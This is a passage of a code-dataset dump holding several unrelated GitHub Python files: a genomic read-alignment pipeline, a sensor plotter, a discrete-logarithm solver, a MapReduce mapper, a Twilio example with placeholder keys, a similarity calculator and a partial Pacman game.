parser.add_argument('--clean', required=False, default=1, choices=[0, 1], type=int, help='If set to 0, then keep all intermediate files, if set to 1, then clean up all intermediate files')\n args = parser.parse_args()\n\n return args.config, args.fastq1, args.fastq2, args.sampleID, args.memory, args.thread, args.ncore, args.outputDIR, args.dryrun, args.clean\n\ndef execute(commandline, dryrun=False):\n ''' Run the command line string as shell script. \n if dryrun==True, then just print out the command without actually running the command'''\n \n if dryrun:\n print(commandline)\n else:\n execute = subprocess.Popen(shlex.split(commandline))\n execute.wait()\n\n return 0\n\ndef indexBam(SAMTOOLSPATH, bamPath, dryrun=False):\n '''indexes the given bam'''\n indexBamCMD = f'{SAMTOOLSPATH} index -@ 4 {bamPath}'\n execute(indexBamCMD, dryrun)\n\n return bamPath\n\ndef align_sort(fq1, fq2, sampleName, referencePath, BWAPATH, SAMTOOLSPATH, outputDIR, nthread=4, dryrun=False, clean=1):\n ''' performs BWA mem alignment and sorting'''\n alignedSam = f'{outputDIR}/{sampleName}.sam'\n alignedBam = f'{outputDIR}/{sampleName}.bam'\n alignedSortedBam = f'{outputDIR}/{sampleName}.sorted.bam'\n\n alignCMD = f'{BWAPATH} mem -v 1 -t {nthread} -R \"@RG\\\\tID:{sampleName}\\\\tSM:{sampleName}\\\\tPL:ILLUMINA\" {referencePath} {fq1} {fq2}'\n if os.path.isfile(alignedBam):\n pass\n else:\n # align to sam file\n if dryrun:\n print(alignCMD)\n else:\n with open(alignedSam, 'w') as f:\n alignExecute = subprocess.Popen(shlex.split(alignCMD), stdout=f)\n alignExecute.wait()\n\n print('### Done aligning to SAM')\n # convert sam to bam \n sam2bamCMD = f'{SAMTOOLSPATH} view -bS -O BAM -o {alignedBam} {alignedSam}'\n execute(sam2bamCMD, dryrun)\n if clean==1:\n cleanup([alignedSam], dryrun)\n\n print('### Done converting SAM to BAM')\n\n\t# sort bam \n bamsortCMD = f'{SAMTOOLSPATH} sort -T {outputDIR}/{sampleName}.sorting -@ {nthread} -O bam -o {alignedSortedBam} {alignedBam}'\n execute(bamsortCMD, dryrun)\n if clean==1:\n cleanup([alignedBam], dryrun)\n print('### Done sorting BAM')\n\n # index aligned and sorted bam \n indexBam(SAMTOOLSPATH, alignedSortedBam, dryrun)\n print('### Done indexing aligned and sorted BAM')\n\n return os.path.abspath(alignedSortedBam)\n\ndef markduplicate(JAVAPATH, PICARDPATH, bamPath, dryrun, clean=1):\n '''mark duplicate of the input bam'''\n markedBam = re.sub(string=bamPath, pattern=r'.bam$', repl='.md.bam')\n # input index bai\n inputBai = f'{bamPath}.bai'\n\n metricTxt = re.sub(string=bamPath, pattern=r'.bam$', repl='.md.txt')\n tmp_dir = os.path.dirname(bamPath) \n\n mdCMD = f'{JAVAPATH} -XX:ParallelGCThreads=8 -Xmx8g -jar {PICARDPATH} MarkDuplicates REMOVE_DUPLICATES=true REMOVE_SEQUENCING_DUPLICATES=true I={bamPath} O={markedBam} M={metricTxt} VALIDATION_STRINGENCY=LENIENT TMP_DIR={tmp_dir} QUIET=true'\n\n if os.path.isfile(markedBam):\n pass\n else:\n execute(mdCMD, dryrun)\n if clean==1:\n cleanup([bamPath, inputBai], dryrun)\n print('### Done marking duplicates')\n\n return os.path.abspath(markedBam)\n\ndef realign(JAVAPATH, GATKPATH, referencePath, bamPath, knownIndelPath, dryrun, clean=1):\n '''creates indel realinger target from known indels -> realigns the provided bam '''\n\n realignTargetInterval = re.sub(string=bamPath, pattern=r'.bam$', repl='.intervals')\n realignedBam = re.sub(string=bamPath, pattern=r'.bam$', repl='.indel.bam')\n realignedBai = re.sub(string=bamPath, pattern=r'.bam$', repl='.indel.bai')\n\n # input index bai\n inputBai = f'{bamPath}.bai'\n\n if os.path.isfile(realignedBam):\n pass\n else:\n\n realignIntervalCMD = f'{JAVAPATH} -Xmx4g -jar {GATKPATH} -T RealignerTargetCreator -R {referencePath} -I {bamPath} --known {knownIndelPath} -o {realignTargetInterval}'\n execute(realignIntervalCMD, dryrun)\n\n realignBamCMD = f'{JAVAPATH} -Xmx4g -jar {GATKPATH} -T IndelRealigner -R {referencePath} -I {bamPath} -targetIntervals {realignTargetInterval} -o {realignedBam}'\n execute(realignBamCMD, dryrun)\n if clean==1:\n cleanup([bamPath, inputBai], dryrun)\n\n print('### Done realigning around indels')\n\n return os.path.abspath(realignedBam)\n\ndef baserecalibrator(JAVAPATH, GATKPATH, referencePath, bamPath, dbSnpPath, knownIndelPath, dryrun, clean=1):\n '''recalibrates base quality'''\n \n recalibrateTable = re.sub(string=bamPath, pattern=r'.bam$', repl='.table')\n recalibratedBam = re.sub(string=bamPath, pattern=r'.bam$', repl='.br.bam')\n\n # input index bai\n inputBai = re.sub(string=bamPath, pattern=r'.bam$', repl='.bai')\n\n if os.path.isfile(recalibratedBam):\n pass\n else:\n baserecalibrateTableCMD = f'{JAVAPATH} -Xmx4g -jar {GATKPATH} -T BaseRecalibrator -R {referencePath} -I {bamPath} -knownSites {dbSnpPath} --knownSites {knownIndelPath} -o {recalibrateTable}'\n execute(baserecalibrateTableCMD, dryrun)\n\n baserecalibrateCMD = f'{JAVAPATH} -Xmx4g -jar {GATKPATH} -T PrintReads -R {referencePath} -I {bamPath} -BQSR {recalibrateTable} -o {recalibratedBam} -nct 8'\n execute(baserecalibrateCMD, dryrun)\n if clean==1:\n cleanup([bamPath, inputBai], dryrun)\n print('### Done recalibrating base quality')\n\n return os.path.abspath(recalibratedBam)\n\ndef cleanup(intermediateFileList, dryrun):\n '''removes all the intermediate files that are not necesssary'''\n for f in intermediateFileList:\n cleanupCMD = 'rm -rf ' + f\n execute(cleanupCMD, dryrun)\n\n return 0\n\ndef main():\n config, fastq1, fastq2, sampleID, memory, thread, ncore, outputDIR, dryrun, clean = argument_parser()\n\n # Configure executale and database paths\n JAVAPATH, PICARDPATH, GATKPATH, SAMTOOLSPATH, BWAPATH, knownIndelPath, dbSnpPath, referencePath = configPath(config)\n\n # BWA MEM align and sort\n alignedBam = align_sort(fastq1, fastq2, sampleID, referencePath, BWAPATH, SAMTOOLSPATH, outputDIR, thread, dryrun, clean)\n # mark duplicate\n markedBam = markduplicate(JAVAPATH, PICARDPATH, alignedBam, dryrun, clean)\n indexBam(SAMTOOLSPATH, markedBam, dryrun)\n\n # indel realign\n realignedBam = realign(JAVAPATH, GATKPATH, referencePath, markedBam, knownIndelPath, dryrun, clean)\n\n # base recalibrate\n recalibratedBam = baserecalibrator(JAVAPATH, GATKPATH, referencePath, realignedBam, dbSnpPath, knownIndelPath, dryrun, clean)\n\n if dryrun:\n print('### This was a dry run')\n else:\n print(f'### Analysis ready bam is located {os.path.abspath(recalibratedBam)}')\n\n return 0\n\nif __name__ == '__main__':\n main()\n\n","repo_name":"ju-lab/autoaligner","sub_path":"fastq2bam.py","file_name":"fastq2bam.py","file_ext":"py","file_size_in_byte":9426,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"}
+{"seq_id":"28954907871","text":"#!/usr/bin/env python\n\nimport os\nimport sys\nimport matplotlib.pyplot as plt\nimport matplotlib.animation as anim\nfrom collections import deque\nimport random\nimport ping\n\n\nif not os.getegid() == 0:\n sys.exit('Script must be run as root')\n\n\n__author__ = \"David Cotterill-Drew\"\n__copyright__ = \"Copyright 2014, RoboTonics\"\n__credits__ = [\"David Cotterill-Drew\"]\n__license__ = \"GPL\"\n__version__ = \"2.0\"\n__maintainer__ = __author__\n__email__ = \"roboshopz@gmail.com\"\n\nMAX_X=100 \t# Width of graph\nMAX_Y=1000 \t# Height of graph \nsonar=0\n\n# initialise line to horizontal line on 0\n\nline=deque([0,0]*MAX_X,maxlen=MAX_X)\n\n\n\ndef update(fn, l2d):\n\t# simulate data[from serial within +-5 of last datapoint\n\tsonar=ping.distance_Ff()\n\tdy=sonar\n\t# add new point to deque\n\tline.append(line[MAX_X-1]+dy)\n\t# set the l2d to the new line coords\n\t# args are ([x-coords],[y-coords])\n\tl2d.set_data(range(-MAX_X/2,MAX_X/2), line)\n\nfig=plt.figure()\n\n# make the axes revolve around [0,0] at the centre\n# instead of the x-axis being 0 to +100, make it -50 to +50\n# ditto for y-axis -512 to +512\n\na=plt.axes(xlim=(-(MAX_X/2),MAX_X/2),ylim=(-(MAX_Y/2),MAX_Y/2))\nl1,=a.plot([], [])\nani=anim.FuncAnimation(fig,update,fargs=(l1,),interval=50)\n\n\nplt.show()","repo_name":"Robotonics/LinuxBot","sub_path":"sensorplot.py","file_name":"sensorplot.py","file_ext":"py","file_size_in_byte":1225,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"3"}
+{"seq_id":"26190523990","text":"from myprime import MyPrime\r\n\r\nclass DLP:\r\n # dengan algoritma Silver-Pohlig-Hellman\r\n def shpDiscreteLog(self, base, log, prime):\r\n myPrime = MyPrime()\r\n \r\n primeMin1 = prime - 1\r\n\r\n # temukan faktor distinct primes\r\n distinctPrimes = self.findDistinctPrimes(primeMin1)\r\n pj = getattr(distinctPrimes, \"pj\")\r\n aj = getattr(distinctPrimes, \"aj\")\r\n B = log\r\n Bderet = []\r\n #ini adalah B[0]\r\n Bderet.append(B)\r\n b = []\r\n j = 0\r\n ej = []\r\n ejmcrt = []\r\n ejM = {}\r\n \r\n # hitung nilai e\r\n # untuk setiap pj\r\n for item in pj:\r\n j = j + 1\r\n # hitung b0\r\n # temukan k\r\n k = 0\r\n \r\n pangkatBase = 0\r\n pangkatB0 = 0\r\n # pastikan terlebih dahulu bahwa pangkat masing-masing\r\n # sisi (alpha dan BO) berupa bilangan bulat\r\n tem = ((prime - 1) * k) % item\r\n if (tem == 0):\r\n pangkatBase = (prime - 1) * k // item\r\n else:\r\n # jika hasil pembagian tidak 0\r\n # maka harus menemukan bilangan x yang\r\n # kongruen terhadap ((prime - 1) * k) % item\r\n x = 1\r\n a = (prime-1) * k % prime\r\n b = (item * x) % prime\r\n # selama masih belum kongruen, temukan x yang memenuhi\r\n while(a != b):\r\n x = x + 1\r\n b = (item * x) % prime\r\n # setelah ditemukan x yang tepat, maka pangkatBase adalah x\r\n pangkatBase = x\r\n \r\n # sama dengan di atas, jika hasil pembagian tidak bulat\r\n tem = (prime - 1) % item\r\n if (tem == 0):\r\n pangkatB0 = (prime - 1) // item\r\n else:\r\n x = 1\r\n a = (prime-1) % prime\r\n b = (item * x) % prime\r\n while(a != b):\r\n x = x + 1\r\n b = (item * x) % prime\r\n pangkatB0 = x\r\n\r\n # pada tahap ini, pangkat alpha dan B0 telah ditemukan\r\n # selanjutnya lakukan iterasi sampai didapati k yang tepat\r\n m = myPrime.modExp(base, pangkatBase, prime)\r\n n = myPrime.modExp(Bderet[0], pangkatB0, prime)\r\n\r\n while(m != n):\r\n k = k + 1\r\n\r\n # pastikan terlebih dahulu bahwa pangkat masing-masing\r\n # sisi (alpha dan BO) berupa bilangan bulat\r\n tem = ((prime - 1) * k) % item\r\n if (tem == 0):\r\n pangkatBase = (prime - 1) * k // item\r\n else:\r\n # jika hasil pembagian tidak 0\r\n # maka harus menemukan bilangan x yang\r\n # kongruen terhadap ((prime - 1) * k) % item\r\n x = 1\r\n p = (prime-1) * k % prime\r\n q = (item * x) % prime\r\n # selama masih belum kongruen, temukan x yang memenuhi\r\n while(p != q):\r\n x = x + 1\r\n q = (item * x) % prime\r\n # setelah ditemukan x yang tepat, maka pangkatBase adalah x\r\n pangkatBase = x\r\n m = myPrime.modExp(base, pangkatBase, prime)\r\n\r\n # ini adalah b0 \r\n b.append(k)\r\n \r\n # =============================================\r\n # sampai pada tahap ini, b0 = k sudah ditemukan\r\n # selanjutnya, kita akan mencari nilai bi\r\n # untuk setiap i = 1, 2, .. ,aj - 1\r\n for i in range(1, aj[item]):\r\n # tentukan nilai Bi = B * (base ^ -(sigma k=0 hingga i-1 ((bk^j) ^ (pj^k))))\r\n # iterasi berikut untuk menghitung pangkat base (dalam bentuk sigma)\r\n sigma = 0\r\n for k in range(0, i):\r\n sigma = sigma + (b[k] ** j) * (item ** k)\r\n\r\n # sigma akan bernilai dikalikan dengan minus 1, yang berarti minus\r\n # karena pangkat bernilai minus, maka yang harus dilakukan adalah\r\n # mencari inversi modulo, namun terlebih dahulu lihat nilai pangkat bukan 1\r\n # maka jadikan setara dengan 1, lalu cari inversi modulonya.\r\n tempBase = base\r\n if(sigma != 1):\r\n tempBase = base ** sigma\r\n sigma = -1\r\n invTempBase = myPrime.inversMod(tempBase, prime)\r\n #ini adalah Bderet[i]\r\n Bderet.append((B * invTempBase) % prime)\r\n # pada tahap ini nilai Bi sudah ditemukan, maka lakukan iterasi untuk mencari nilai\r\n # k yang memenuhi persamaan Bi ^ ((p-1) / (pj ^ (i+1))) kongruen base ^ ((p-1) * (bi^j) / pj) (mod prime)\r\n\r\n # lakukan hal yang sama seperti ketika mencari b0\r\n pangkatBi = 0\r\n pangkatBase = 0\r\n tem = ((prime - 1) * k) % item\r\n if (tem == 0):\r\n pangkatBase = (prime - 1) * k // item\r\n else:\r\n x = 1\r\n p = (prime-1) * k % prime\r\n q = (item * x) % prime\r\n while(p != q):\r\n x = x + 1\r\n q = (item * x) % prime\r\n pangkatBase = x\r\n \r\n tem = (prime - 1) % (item ** (i + 1))\r\n if (tem == 0):\r\n pangkatBi = (prime - 1) // (item ** (i + 1))\r\n else:\r\n x = 1\r\n p = (prime - 1) % prime\r\n q = ((item ** (i + 1)) * x) % prime\r\n while(p != q):\r\n x = x + 1\r\n q = ((item ** (i + 1)) * x) % prime\r\n pangkatBase = x\r\n\r\n m = myPrime.modExp(base, pangkatBase, prime)\r\n n = myPrime.modExp(Bderet[i], pangkatBi, prime)\r\n\r\n while(m != n):\r\n tem = ((prime - 1) * k) % item\r\n if (tem == 0):\r\n pangkatBase = ((prime - 1) * k) // item\r\n else:\r\n x = 1\r\n p = ((prime-1) * k) % prime\r\n q = (item * x) % prime\r\n while(p != q):\r\n x = x + 1\r\n q = (item * x) % prime\r\n pangkatBase = x\r\n m = myPrime.modExp(base, pangkatBase, prime)\r\n\r\n # ini adalah bi\r\n b.append(k)\r\n\r\n # ===================\r\n # sampai disini, telah didapat deret b[i] untuk pj\r\n # selanjutnya kita akan mencari nilai e untuk basis pj\r\n # dengan menjumlahkan semua deret b[i]\r\n\r\n tempe = 0\r\n for i in range(0, aj[item]):\r\n tempe = tempe + (b[i] ** j) * (item ** i)\r\n \r\n bentar = tempe % (item ** aj[item])\r\n # ini adalah ej[j]\r\n ej.append(bentar)\r\n ejmcrt.append(item ** aj[item])\r\n # ini adalah pemodulo dari ej\r\n ejM[bentar] = (item ** aj[item])\r\n x = self.chineseRT(ej, ejmcrt)\r\n x = x % self.lcm(ejmcrt)\r\n reval = HasilSHP(ej, ejM, x)\r\n return reval\r\n\r\n # mencari faktorisasi distinct primes\r\n def findDistinctPrimes(self, primeMin1):\r\n # pj dan aj akan diisi pada atribut reval\r\n pj = [] # list\r\n aj = {} # dictionary\r\n \r\n # metode trivial\r\n pembagi = 2\r\n eksponen = 0\r\n\r\n # coba pembagian 2, selanjutnya dimulai dari 3\r\n # dengan increment 2\r\n if(((primeMin1 % pembagi) == 0) and (pembagi < (primeMin1 / 2))):\r\n pj.append(pembagi)\r\n while((primeMin1 % pembagi) == 0):\r\n primeMin1 = primeMin1 // pembagi\r\n eksponen = eksponen + 1\r\n aj[pembagi] = eksponen\r\n\r\n # mulai dari sini pembagi dimulai dari 3\r\n pembagi = pembagi + 1\r\n\r\n # reset eksponen\r\n eksponen = 0\r\n\r\n # selama pembagi masih < primeMin1 / 2\r\n while(pembagi < (primeMin1 / 2)):\r\n while((primeMin1 % pembagi) == 0):\r\n primeMin1 = primeMin1 // pembagi\r\n eksponen = eksponen + 1\r\n if(eksponen > 0):\r\n pj.append(pembagi)\r\n aj[pembagi] = eksponen\r\n #restart eksponen\r\n eksponen = 0\r\n\r\n # setelah tidak bisa dibagi lagi,\r\n # pembagi dinaikkan valuenya dengan range 2\r\n pembagi = pembagi + 2\r\n\r\n if(primeMin1 > 1):\r\n pj.append(primeMin1)\r\n aj[primeMin1] = 1\r\n \r\n reval = DistinctPrimes()\r\n # Set attribute\r\n setattr(reval, 'pj', pj)\r\n setattr(reval, 'aj', aj)\r\n return reval\r\n\r\n def chineseRT(self, listA, listMod):\r\n myPrime = MyPrime()\r\n M = 1\r\n\r\n # hitung LCM dari setiap pemodulo\r\n # BELOM DISINI\r\n\r\n # hitung nilai M\r\n for i in range(len(listMod)):\r\n M = M * listMod[i]\r\n\r\n listM = []\r\n # hitung nilai M/m untuk setiap nilai m\r\n for i in range(len(listMod)):\r\n temp = M // listMod[i]\r\n listM.append(temp)\r\n\r\n # hitung inversi modulo\r\n listInvM = []\r\n for i in range(len(listM)):\r\n temp = myPrime.inversMod(listM[i], listMod[i])\r\n listInvM.append(temp)\r\n\r\n # hitung x\r\n x = 0\r\n for i in range(len(listA)):\r\n temp = listA[i] * listM[i] * listInvM[i]\r\n x = x + temp\r\n \r\n return x\r\n\r\n def lcm(self, listNumber):\r\n a = 1\r\n b = 1\r\n for item in listNumber:\r\n b = a * item\r\n a = b // self.gcdEuclidean(a, item)\r\n return a\r\n\r\n # mencari gcd dua buah bilangan\r\n # menggunakan euclidean algorithm\r\n def gcdEuclidean(self, a, b):\r\n x = 0\r\n while(b != 0):\r\n x = a % b\r\n a = b\r\n b = x\r\n return a\r\n\r\nclass DistinctPrimes:\r\n pj = [] #basis\r\n aj = {} #eksponen (pangkat)\r\n\r\n def showInfo(self):\r\n print(\"The Distinct Primes\")\r\n for item in self.pj:\r\n print(item, \"^\", self.aj[item])\r\n\r\n def hitungProduct(self):\r\n hasil = 1\r\n for item in self.pj:\r\n hasil = hasil * (item * self.aj[item])\r\n return hasil\r\n\r\nclass HasilSHP:\r\n ej = []\r\n ejM = {}\r\n x = 0\r\n\r\n def __init__(self, initej, initejM, initx):\r\n self.ej = initej\r\n self.ejM = initejM\r\n self.x = initx\r\n \r\n def showInfo(self):\r\n print(\"Hasil SHP\")\r\n for item in self.ej:\r\n print(item, \"mod\", self.ejM[item])\r\n print(\"x:\", self.x)\r\n\r\ndlp = DLP()\r\nprime = 73\r\nbase = 5\r\nlog = 68\r\nmylist = dlp.shpDiscreteLog(base, log, prime)\r\nej = getattr(mylist, \"ej\")\r\nejM = getattr(mylist, \"ejM\")\r\nmylist.showInfo()\r\n'''print(\"==========\")\r\nprint(\"Ngetes CRT\")\r\nA = [2,3,2]\r\nB = [3,5,7]\r\nx = dlp.chineseRT(A,B)\r\nprint(x)\r\nprint(\"==========\")\r\nprint(\"Ngetes LCM\")'''\r\n'''mylist = [3,4,8]\r\nx = dlp.lcm(mylist)\r\nprint(x)'''\r\n","repo_name":"vynhart/skripsi","sub_path":"dlp.py","file_name":"dlp.py","file_ext":"py","file_size_in_byte":11441,"program_lang":"python","lang":"id","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"}
+{"seq_id":"28325786810","text":"from pathlib import Path\n\ndata_dir = './sartorius-cell-instance-segmentation'\nBATCH_SIZE = 2\nNUM_EPOCHS = 5\n\nTRAIN_CSV = f\"{data_dir}/train.csv\"\nTRAIN_PATH = f\"{data_dir}/train\"\nTEST_PATH = f\"{data_dir}/test\"\nTRAIN_FILES = sorted(list(Path(TRAIN_PATH).rglob('*png')))\n\n\nROOT = Path(data_dir)\nTRAIN_PATH_ = Path(TRAIN_PATH)\n\nWIDTH = 704\nHEIGHT = 520\n# Threshold for mask length\nTH = 40\nBATCH_SIZE = 2\nLR = 1e-3\nWEIGHT_DECAY = 0.0005\n\n\n# Normalize to resnet mean and std if True.\nRESNET_MEAN = [0.485, 0.456, 0.406]\nRESNET_STD = [0.229, 0.224, 0.225]\nIMAGE_RESIZE = (224, 224)","repo_name":"Paull-dark/Sartorius_Cell_Segmentation","sub_path":"conf.py","file_name":"conf.py","file_ext":"py","file_size_in_byte":574,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"3"}
+{"seq_id":"4609434003","text":"# Download the helper library from https://www.twilio.com/docs/python/install\nfrom twilio.rest import Client\n\n\n# Your Account Sid and Auth Token from twilio.com/console\n# DANGER! This is insecure. See http://twil.io/secure\naccount_sid = 'ACXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX'\nauth_token = 'your_auth_token'\nclient = Client(account_sid, auth_token)\n\nsubscribed_track = client.video \\\n .rooms('RMXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX') \\\n .participants('PAXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX') \\\n .subscribed_tracks \\\n .update(track='MTXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX')\n\nprint(subscribed_track.name)\n","repo_name":"CodaKris/sample-code","sub_path":"video/v1/subscribed_track/update-default/update-default.6.x.py","file_name":"update-default.6.x.py","file_ext":"py","file_size_in_byte":685,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"3"}
+{"seq_id":"3155099040","text":"\n# Enter your code here. Read input from STDIN. Print output to STDOUT\nqueue = []\n\nfor i in range(int(input())):\n command = [int(x) for x in input().split(' ')]\n if command[0] == 1:\n queue.append(command[1])\n elif command[0] == 2:\n queue.pop(0)\n elif command[0] == 3:\n print(queue[0])","repo_name":"IgnatIvanov/HackerRank","sub_path":"3 Months Preparation Kit/Week 08/Queue using Two Stacks/Queue using Two Stacks.py","file_name":"Queue using Two Stacks.py","file_ext":"py","file_size_in_byte":317,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"}
+{"seq_id":"74856517520","text":"#!/usr/bin/env python3\n\n# Import XML RPC server to receive data from the main_node to map\nfrom xmlrpc.server import SimpleXMLRPCServer\n\n# Import XML RPC client to then send the mapped data to the reducer\nimport xmlrpc.client\n\n# Import group by to sort the data that will be separated by which node\nfrom itertools import groupby\n\n\n# Initialize the mapper with an address and port number\n# Start an rpc server to get the data\ndef init_mapper(address, port, mapper_num):\n print(\"Mapper {} ready!\".format(mapper_num))\n server = SimpleXMLRPCServer((address, port), allow_none=True)\n server.register_function(map_data_wordcount, \"map_data_wordcount\")\n server.register_function(map_data_inverted_index, \"map_data_inverted_index\")\n server.serve_forever()\n\n\n# Map the data given from the main node\n# Send it out based on the size of the word by hashing\ndef map_data_wordcount(data, mappers, reducers, address, port):\n values = []\n\n # The reducer node ports are numbered\n reducer_node = mappers + reducers - 1\n\n # Clean up any grammatical things in the word and map it\n # Then create a new array to store the newly mapped data\n # Store it with the respective mapper it will go to, this is done with the hashing function\n for word in data:\n word = word.replace(\".\", \"\")\n word = word.replace(\",\", \"\")\n mapped_word = word + \",1\"\n node_num = hash_word(word, reducers)\n values.append(str(node_num) + \":\" + str(mapped_word))\n\n # Sort the data by the reducer its going to and then group it together\n values.sort(key=lambda x: x[0])\n data = [list(i) for j, i in groupby(values, lambda a: a.split(\":\")[0])]\n\n print(\"Sending to reducers\")\n # For each reducer, send out its designated data over RPC using an rpc client\n for i in range(reducers):\n with xmlrpc.client.ServerProxy(\"http://\" + address + \":\" + str(port + reducer_node)) as proxy:\n proxy.get_map_wordcount(data[i], mappers, i, address, port)\n\n\n# Map the data given from the main node\n# Send it out based on the size of the word by hashing\ndef map_data_inverted_index(data, mappers, reducers, address, port, doc_num):\n mapped = []\n cleaned = []\n\n # Clean up the words for commas and periods\n for word in data:\n word = word.replace(\",\", \"\")\n word = word.replace(\".\", \"\")\n cleaned.append(word)\n\n # Sort the data alphabetically\n cleaned.sort()\n # Group the data together that is the same (based on the word)\n data = [list(i) for j, i in groupby(cleaned)]\n\n # Go through each set of data (like words) and add its designation by hashing from word length\n for i in data:\n occur = len(i)\n word = i[0]\n hash_value = hash_word(word, reducers)\n mapped.append(str(hash_value) + \":\" + str(word) + \",\" + str(doc_num) + \"-\" + str(occur))\n\n # Sort the data based on the reducer it is going to\n mapped.sort()\n chunks = [list(i) for j, i in groupby(mapped, lambda a: a.split(\":\")[0])]\n\n print(\"Sending to reducers\")\n # Go through all of the data and sent it to its designated reducer\n for i in range(len(chunks)):\n with xmlrpc.client.ServerProxy(\"http://\" + address + \":\" + str(port + mappers + i)) as proxy:\n proxy.get_map_inverted_index(chunks[i], mappers, i, address, port)\n\n\n# Return N - 1 reducer to send to based on the length % number of reducers\ndef hash_word(word, reducers):\n return len(word) % reducers\n","repo_name":"compact-disc/MapReduce","sub_path":"mapper_node.py","file_name":"mapper_node.py","file_ext":"py","file_size_in_byte":3461,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"}
+{"seq_id":"70584643603","text":"#!/usr/bin/env python\n\n'''similarities.py : similarity calculations\n\nMain task: take entities list at DF_ENT_CSV and calculate a similarities\nmatrix for a filtered subset of the entities, saved to csv_out (command line\nargument)\n'''\n\nimport pandas as pd\nfrom scipy import sparse\nfrom sklearn.feature_extraction import DictVectorizer\nfrom sklearn.feature_extraction.text import TfidfVectorizer\nfrom sklearn.metrics.pairwise import cosine_similarity\nfrom sys import argv\n\nDF_ENT_CSV = '/home/abirdsall/insight/histmark/data/190128-df-ent.csv'\n\ndef load_df_ent():\n df_ent = pd.read_csv(DF_ENT_CSV)\n return df_ent\n\ndef entities_to_encode(df_ent):\n # only include entities that appear on at least two plaques\n mrkrs_per_ent = df_ent.groupby('text').marker_id.apply(lambda x: len(x.unique()))\n ents_to_keep = mrkrs_per_ent[mrkrs_per_ent>1].index.values\n df_ent = df_ent[df_ent.text.isin(ents_to_keep)]\n return df_ent\n\ndef encode_entities_binary(df_ent):\n # prep df to binary encode each entity as feature\n entity_marker_df = df_ent.loc[:,['text','marker_id']].rename(columns={'text':'entity'})\n grouped = entity_marker_df.groupby('marker_id').entity.apply(lambda lst: tuple((k, 1) for k in lst))\n category_dicts = [dict(tuples) for tuples in grouped]\n v = DictVectorizer(sparse=False)\n\n X = v.fit_transform(category_dicts)\n\n # df_ent_obs is dataframe where each column is feature\n df_ent_obs = pd.DataFrame(X, columns=v.get_feature_names(), index=grouped.index)\n A_sparse = sparse.csr_matrix(df_ent_obs)\n return A_sparse\n\ndef encode_entities_tfidf(df_ent):\n # prep for TfidfVectorizer using split on _ as analyzer\n entity_str_per_marker = df_ent.groupby('marker_id').text.agg(lambda x: \"_\".join(x))\n\n vectorizer = TfidfVectorizer(analyzer=lambda x: x.split('_'))\n X = vectorizer.fit_transform(entity_str_per_marker)\n return X\n\ndef similarities_pipeline(csv_out, enc_type='binary'):\n df_ent = load_df_ent()\n\n # only keep entities on multiple markers\n df_ent = entities_to_encode(df_ent)\n\n if enc_type=='binary':\n # binary encoding of each entity\n sparse_encoding = encode_entities_binary(df_ent)\n elif enc_type=='tfidf':\n sparse_encoding = encode_entities_tfidf(df_ent)\n else:\n raise ValueError('invalid enc_type')\n\n # calculate similarity matrix\n similarities = cosine_similarity(sparse_encoding)\n\n # put into dataframe with columns and index of marker_id\n marker_ids = df_ent.groupby('marker_id').count().index\n df_sim = pd.DataFrame(similarities, index=marker_ids)\n df_sim.columns = marker_ids\n\n print(\"similarities matrix made. head:\")\n print(df_sim.head())\n\n if csv_out is not None:\n print('writing output to {}'.format(csv_out))\n df_sim.to_csv(csv_out)\n\n return df_sim\n\n\nif __name__ == '__main__':\n print('running similarities.py from command line')\n if len(argv)>1:\n csv_out = argv[1]\n else:\n csv_out = None\n similarities_pipeline(csv_out, 'binary')\n print('similarities.py: done.')\n","repo_name":"awbirdsall/pastpath","sub_path":"scripts/similarities.py","file_name":"similarities.py","file_ext":"py","file_size_in_byte":3068,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"3"}
+{"seq_id":"36658909071","text":"import pygame\nimport sys\nfrom main_menu import Main_Menu\nfrom sprite_sheet import Sprite_Sheet\nfrom character import Pacman\nfrom character import Ghost\nfrom maze import Maze\nfrom text import Text\nimport settings\n\nclass Game:\n\n def __init__(self, SCREEN_WIDTH, SCREEN_HEIGHT):\n\n pygame.init()\n #Checks if game is running\n self.is_running = True\n #Screen Dimensions and info\n self.SCREEN_WIDTH = SCREEN_WIDTH\n self.SCREEN_HEIGHT = SCREEN_HEIGHT\n self.screen = pygame.display.set_mode((SCREEN_WIDTH, SCREEN_HEIGHT))\n pygame.display.set_caption(\"Test\")\n self.clock = pygame.time.Clock()\n\n #colors\n self.colors ={\"Black\": (0, 0, 0),\n \"Red\": (255, 0, 0),\n \"Green\": (0, 255, 0),\n \"Blue\": (0, 0, 255),\n \"White\": (255, 255, 255),\n \"Yellow\": (255, 255, 0)}\n\n #Settings\n self.pacman_lives_count = 3\n\n\n #Create Objects Here\n self.sprite_sheet = Sprite_Sheet(\"images/Pacman.png\", \"text files/Pacman.xml\", self.screen)\n self.sprite_dictionary = self.sprite_sheet.dataDict\n self.maze = Maze(self.screen, self.sprite_sheet, \"text files/pacmanportalmaze.txt\")\n self.pacman = Pacman(self.screen, self.sprite_sheet, self.maze.scale_size_x, self.maze.scale_size_y,\n self.maze.pacman_start_x, self.maze.pacman_start_y)\n self.score_text = Text(self.screen, \"Points: \",self.colors[\"White\"], self.colors[\"Black\"],\n self.SCREEN_WIDTH/2, self.SCREEN_HEIGHT-self.maze.reserved_height)\n self.lives_text = Text(self.screen, \"Lives: \", self.colors[\"White\"], self.colors[\"Black\"],\n self.maze.half_reserved_width, self.SCREEN_HEIGHT-self.maze.reserved_height)\n self.pacman_menu = Pacman(self.screen, self.sprite_sheet, self.maze.scale_size_x * 3,\n self.maze.scale_size_y * 3, -200, self.maze.scale_size_y)\n\n #Ghost\n self.ghost_blinky = Ghost(self.screen, self.sprite_sheet, self.maze.scale_size_x, self.maze.scale_size_y,\n self.maze.blinky_start_x, self.maze.blinky_start_y)\n\n self.pacman_lives_stored = []\n self.load_pacman_lives()\n\n #Center Text Properly\n 